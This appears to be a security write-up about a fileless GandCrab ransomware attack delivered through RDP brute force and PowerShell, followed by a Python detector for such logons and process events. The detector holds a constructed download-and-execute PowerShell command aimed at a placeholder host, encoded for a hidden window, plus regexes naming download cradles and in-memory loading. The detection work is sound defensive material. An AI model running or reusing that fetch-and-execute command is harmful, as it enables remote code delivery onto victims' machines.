The GandCrab ransomware, first discovered in January 2018, is a well-known ransomware family that has been widely distributed on the dark web. It mainly targets Scandinavian and English-speaking countries.
GandCrab was quickly adopted by cybercriminals because of its distinctive features, such as custom ransom notes based on the type and volume of encrypted files, with ransom demands ranging from the low hundreds to thousands of dollars. GandCrab also makes use of several entry vectors to penetrate a victim's machine.
Fileless ransomware attacks operate by taking default Windows tools, particularly PowerShell and Windows Management Instrumentation (WMI), and using them for malicious activities.
The SandBlast team recently became aware of fileless attacks targeting a series of Windows 10 machines acting as web servers. In this case, the machines had their RDP ports open and publicly accessible. As a result, attackers managed to log into the machines remotely using a brute-force technique and then executed a simple command, which triggered the ransomware process.
The attack then proceeds from a Windows Command Prompt, which calls PowerShell, the native Windows command-line shell and task-management framework, to download a malicious script. The first-stage PowerShell script was obfuscated; it determined the processor architecture of the system and downloaded the second-stage script suited to the corresponding operating system.
The second-stage PowerShell script used the 'Reflective DLL Injection' technique: the DLL is mapped into memory by the script itself, bypassing steps the Windows loader normally performs when a DLL is loaded from disk. From that point, the PowerShell process was essentially hijacked by GandCrab and acted as the host executable for GandCrab's internal functions.
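The chain described above (RDP brute force, then cmd.exe spawning a PowerShell download cradle with an architecture check) leaves distinct traces in the Windows Security log and in process-creation telemetry. The following detector is an added example and is not code from the original report or from Check Point; every event record, IP address, URL and the five-failure threshold are constructed or assumed for illustration, and the event fields are a simplified rendering of Security event IDs 4624/4625 and Sysmon event ID 1 rather than the real XML schema.

```python
import base64
import re
from datetime import datetime, timedelta

# Constructed first-stage command, modelled on the behaviour the report describes
# (architecture check, then download of the matching second stage). The host is a
# placeholder, not an indicator from the article.
STAGE1_COMMAND = (
    "$u = if ([IntPtr]::Size -eq 8) {'http://placeholder.invalid/x64.ps1'} "
    "else {'http://placeholder.invalid/x86.ps1'}; "
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)
# PowerShell's -EncodedCommand takes the base64 of the UTF-16LE script text.
STAGE1_ENCODED = base64.b64encode(STAGE1_COMMAND.encode("utf-16-le")).decode("ascii")

# Constructed Security-log records. 4625 = failed logon, 4624 = successful logon,
# LogonType 10 = RemoteInteractive, i.e. RDP.
SECURITY_EVENTS = [
    {"time": "2018-09-01T02:00:00", "id": 4625, "src": "203.0.113.7", "user": "administrator", "logon_type": 10},
    {"time": "2018-09-01T02:00:20", "id": 4625, "src": "203.0.113.7", "user": "administrator", "logon_type": 10},
    {"time": "2018-09-01T02:00:41", "id": 4625, "src": "203.0.113.7", "user": "administrator", "logon_type": 10},
    {"time": "2018-09-01T02:01:05", "id": 4625, "src": "203.0.113.7", "user": "administrator", "logon_type": 10},
    {"time": "2018-09-01T02:01:30", "id": 4625, "src": "203.0.113.7", "user": "administrator", "logon_type": 10},
    {"time": "2018-09-01T02:02:02", "id": 4625, "src": "198.51.100.9", "user": "backup", "logon_type": 10},
    {"time": "2018-09-01T02:02:55", "id": 4624, "src": "203.0.113.7", "user": "administrator", "logon_type": 10},
]

# Constructed Sysmon-style process-creation records (event ID 1).
PROCESS_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + STAGE1_ENCODED},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",   # benign control
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]


def detect_rdp_brute_force(events, threshold=5, window=timedelta(minutes=10)):
    """Flag an RDP logon (4624, type 10) preceded within `window` by at least
    `threshold` failed RDP logons from the same source address."""
    alerts = []
    failures = {}  # source address -> timestamps of failed RDP logons
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] != 10:
            continue
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4625:
            failures.setdefault(ev["src"], []).append(t)
        elif ev["id"] == 4624:
            recent = [f for f in failures.get(ev["src"], []) if t - f <= window]
            if len(recent) >= threshold:
                alerts.append({"src": ev["src"], "user": ev["user"],
                               "failures": len(recent), "time": ev["time"]})
    return alerts


# Common spellings of the -EncodedCommand switch followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Traits of the reported chain, checked against the command line and its decoded payload.
INDICATORS = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no_profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "download_cradle": re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\bIEX\b|Invoke-Expression"),
    "in_memory_load": re.compile(r"(?i)VirtualAlloc|WriteProcessMemory|\[Reflection\.Assembly\]::Load|FromBase64String"),
    "arch_check": re.compile(r"(?i)IntPtr\]::Size|PROCESSOR_ARCHITECTURE|Is64BitOperatingSystem"),
}


def score_powershell_event(ev):
    """Return the names of suspicious traits found in one process-creation event."""
    hits = []
    if ev["image"].lower().endswith("powershell.exe") and ev["parent"].lower().endswith("cmd.exe"):
        hits.append("spawned_by_cmd")
    text = ev["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.append("encoded_command")
        text = text + " " + decoded  # inspect the decoded script as well as the raw command line
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            hits.append(name)
    return hits


if __name__ == "__main__":
    for a in detect_rdp_brute_force(SECURITY_EVENTS):
        print("RDP brute force then success:", a)
    for ev in PROCESS_EVENTS:
        print(ev["image"].rsplit("\\", 1)[-1], "->", score_powershell_event(ev) or "clean")
```

The two detectors are deliberately independent: the logon correlation fires on the initial access regardless of what is executed afterwards, and the process scoring fires on the cmd.exe to PowerShell handoff even when the brute-force events were never collected. Decoding the `-EncodedCommand` argument before pattern matching matters because the architecture check and the download cradle live inside the encoded blob, not in the visible command line.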
The PowerShell scripts were de-obfuscated by SandBlast Behavioral Guard and added to the report to increase the transparency and understanding of the scripts' intentions.